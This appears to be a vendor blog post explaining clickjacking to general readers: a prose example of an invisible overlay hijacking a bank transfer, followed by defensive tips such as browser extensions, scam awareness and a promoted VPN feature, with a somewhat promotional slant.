Sneaky clickjacking attacks and their prevention

Clickjacking is one of the trickiest and craftiest cyber attacks these days. Imagine you visit a website and see an appealing “Free iPhone – limited time offer!” ad. Tempted by the offer, you immediately click on the big button to claim your reward. Instead of getting a new smartphone for free, hackers empty your bank account. Easy as that, you’ve fallen victim to a clickjacking attack. Luckily, there are effective preventative measures to defend yourself.

What is clickjacking?

Clickjacking (or User Interface (UI) Redressing) refers to an attack, which tricks users into clicking on malicious web elements. Clickjacking disguises a component or a whole web page with a transparent overlay that looks nothing but legitimate. When you click on a button on a seemingly-innocent website, you’re actually clicking on the transparent overlay, triggering malicious processes. In such a deceptive manner, it tricks users into downloading malware, revealing credentials and sensitive information, or unwittingly making a wire transfer.

Example of a clickjacking attack

  1. The attacker creates an attractive website or form, which offers you to win a free iPhone or a trip to the Bahamas.
  2. Attackers utilize query parameters to insert their bank details into the form.
  3. When you visit that page, the attack checks if you are logged into your banking account.
  4. Your bank transfer page features a fake overlay right above the “Win a trip to the Bahamas” page. Hackers place the secret “Donate all your money” button precisely under the “Receive gift” button visible to you.
  5. You visit the fake page and click the button excited to win the prize.
  6. In reality, you clicked on an invisible overlay and confirmed the “Donate all your money” transaction to your bank. Your funds end up reaching the attackers.
  7. In such a clickjacking attack, malicious action is untraceable. You’ve performed it while being legitimately logged into your banking account.

Mitigating clickjacking attacks

Since the majority of clickjacking attacks involve embedding the targeted website in an iframe, the mitigation methods revolve around server-side configurations. The success of such attacks depends on browser compliance to control the highest web standards and best practices.

Still, the mitigation doesn’t end with server-side protection mechanisms. In the end, most of the clickjacking attacks victimize users by using various social engineering techniques. Here’s what to do:

  1. Download browser extensions

Browser extensions can detect if the current page window is authentic or “redressed.” Also, these extensions can prevent you from clicking on invisible frames and intercept potential attacks against you. You can try the NoClickjack extension for Chrome, Firefox, Safari, Opera, and Microsoft Edge, or NoScript for Chrome and Firefox.

  1. Learn to recognize social engineering scams

Phishing, vishing, whaling, pretexting, baiting, and clickjacking are only a few of the many social engineering techniques. By educating yourself about the fundamental principles of prevalent threats, you can quickly recognize them. Always use common sense and remember: if it sounds too good to be true, then it probably is.

  1. Use a VPN

Install a VPN to encrypt your traffic so that no cybercriminals can intercept and steal your private information. Although falling victim to a clickjacking attack is a result of human error, VPN can preserve your digital privacy. Atlas VPN feature SafeBrowse prevents you from entering malicious websites, blocks suspicious redirects, annoying pop-ups, and ads.


John C.

John C.


Tags: clickjacking